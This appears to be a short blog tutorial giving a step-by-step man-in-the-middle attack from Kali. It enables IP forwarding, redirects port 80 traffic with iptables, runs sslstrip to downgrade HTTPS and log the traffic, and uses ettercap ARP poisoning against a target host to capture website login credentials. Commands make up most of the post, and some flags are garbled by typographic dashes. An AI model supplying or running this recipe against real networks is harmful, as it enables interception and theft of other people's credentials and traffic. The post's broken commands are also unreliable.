Using sslstrip and ettercap for a MITM attack

A quick tutorial on an awesome MITM attack which covers up the ‘Untrusted Certificate error’ using sslstrip and ettercap. This was done by me using Kali in a VM bridged to my network in order to capture my main machines credentials but could also be used in NAT environment

Setup IP forwarding on your Kali device by typing:

echo 1 > /proc/sys/net/ipv4/ip_forward

and setup port redirection using Iptables:

iptables -A PREROUTING -t nat -i wlan2 -p tcp –dport 80 -j REDIRECT –to-port 8080

(this is to tell iptable to redirect all traffic to port 8080 where sslstrip is listening)

Start SSLstrip

sslstrip -a -f -l 8080 -w test (or whatever name of file you want)

then start Ettercap

ettercap -T -q -i (NIC, so eth0 or wlan0 however you got it configured) -M arp /ipofthetarger/ //

and there we go, try login in to whatever website with SSL encryption and you ll get the results ;)


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s